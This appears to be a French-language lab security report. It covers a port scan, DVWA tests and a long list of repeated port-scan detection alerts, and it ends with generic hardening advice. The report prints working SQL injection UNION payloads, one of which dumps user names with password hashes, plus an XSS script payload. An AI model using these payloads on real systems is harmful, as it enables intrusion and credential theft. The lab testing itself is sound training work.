```
______
         RAPPORT DE DÉTECTION DE SCAN DE PORTS
______
[DATE] Date de génération: 2025-06-17 13:33:41
[TEMPS] Durée d'analyse: 4.15 secondes
[CONFIG] Configuration Scan: 100 paquets SYN, 1000 paquets UDP, 100 ports en 60s
[CONFIG] Configuration Force Brute: 100 requêtes en 10s (principal), 10 SSH, 15 FTP, 50
HTTP
[SCAN] RÉSULTAT DU SCAN DE PORTS EXTERNE
  Cible: 143.110.170.33
  Ports scannés: 8344
  Ports ouverts (3): 22, 80, 8081
[TEST] TESTS DVWA (SQLi + XSS)
_____
  Cible: 143.110.170.33
  SOLi:
    - URL: http://143.110.170.33/DVWA/vulnerabilities/sqli/
    - Colonnes détectées: 2
    - Payloads testés: 3
    - Succès: 3
    - Payloads réussis (3):
        _____
       PAYLOAD:
6' UNION SELECT 1,1 -- -
       RÉPONSE:
         ID: 6' UNION SELECT 1,1 -- -<br/>br />First name: 1<br/>br />Surname: 1
        ______
       PAYLOAD:
6' UNION SELECT database(), NULL -- -
       RÉPONSE:
         ID: 6' UNION SELECT database(),NULL -- -<br/>br />First name: dvwa<br/>br />Surname:
        ______
        ______
       PAYLOAD:
6' UNION SELECT user, password FROM users -- -
       RÉPONSE:
          ID: 6' UNION SELECT user, password FROM users -- -<br/> />First name: admin<br/>
/>Surname: 5f4dcc3b5aa765d61d8327deb882cf99
          ID: 6' UNION SELECT user, password FROM users -- -<br/>br />First name: gordonb<br/>br
/>Surname: e99a18c428cb38d5f260853678922e03
           ID: 6' UNION SELECT user, password FROM users -- -<br/>br />First name: 1337<br/>
/>Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
          ID: 6' UNION SELECT user, password FROM users -- -<br/> />First name: pablo<br/>
br
/>Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
          ID: 6' UNION SELECT user, password FROM users -- -<br/>br />First name: smithy<br/>cbr
/>Surname: 5f4dcc3b5aa765d61d8327deb882cf99
        ______
```

XSS: Succès

Payloads injectés avec succès:

* <script>alert('XSS')</script>

[ALERTE] ATTAQUES DÉTECTÉES!

[STATS] Nombre total d'alertes: 53

[IP] IPs sources uniques: 1

[TCP] SCANS DE PORTS:

- Scans TCP: 53 - Scans UDP: 0

- Total: 53

[ATTAQUANT] ATTAQUANT: 203.0.113.100

[TCP] SCANS TCP (53 alertes):

1. 2025-06-17T13:33:41
Ports scannés: 8 ports

Échantillon: 21, 22, 23, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 100

2. 2025-06-17T13:33:41

Ports scannés: 8 ports

Échantillon: 21, 22, 23, 80, 110, 143, 443, 3389

Durée: 0.00s
Paquets SYN: 101

3. 2025-06-17T13:33:41

Ports scannés: 8 ports

Échantillon: 21, 22, 23, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 102

4. 2025-06-17T13:33:41

Ports scannés: 8 ports

Échantillon: 21, 22, 23, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 103

5. 2025-06-17T13:33:41

Ports scannés: 8 ports

Échantillon: 21, 22, 23, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 104

6. 2025-06-17T13:33:41

Ports scannés: 8 ports

Échantillon: 21, 22, 23, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 105

Ports scannés: 8 ports

Échantillon: 21, 22, 23, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 106

8. 2025-06-17T13:33:41

Ports scannés: 8 ports

Échantillon: 21, 22, 23, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 107

9. 2025-06-17T13:33:41

Ports scannés: 8 ports

Échantillon: 21, 22, 23, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 108

10. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 109

11. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 110

12. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s
Paquets SYN: 111

13. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 112

14. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 113

15. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 114

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 115

17. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 116

18. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 117

19. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 118

20. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s
Paquets SYN: 119

21. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 120

22. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 121

23. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 122

24. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 123

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 124

26. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 125

27. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.00s Paquets SYN: 126

28. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 127

29. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s
Paquets SYN: 128

30. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 129

31. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 130

32. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 131

33. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 132

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 133

35. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 134

36. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s
Paquets SYN: 135

37. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 136

38. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 137

39. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 138

40. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 139

41. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 140

42. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 141

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 142

44. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 143

45. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 144

46. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 145

47. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s
Paquets SYN: 146

48. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 147

49. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 148

50. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 149

51. 2025-06-17T13:33:41

Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 150 52. 2025-06-17T13:33:41
Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 151

53. 2025-06-17T13:33:41
Ports scannés: 9 ports

Échantillon: 21, 22, 23, 25, 80, 110, 143, 443, 3389

Durée: 0.01s Paquets SYN: 152

[CONSEIL] RECOMMANDATIONS DE SÉCURITÉ

[SECURISE] Actions immédiates:

- Bloquer les adresses IP malveillantes dans le pare-feu
- Surveiller les logs système pour d'autres activités suspectes
- Vérifier l'intégrité des comptes utilisateurs

[TCP] Pour les scans de ports:

- Activer la protection contre les scans de ports
- Configurer des règles de limitation de débit (rate limiting)
- Masquer les services non nécessaires

[PROTECTION] Mesures préventives:

- Déployer un système IDS/IPS
- Mettre à jour les règles de sécurité réseau
- Programmer des analyses de sécurité régulières
- Former le personnel sur les bonnes pratiques de sécurité

Fin du rapport
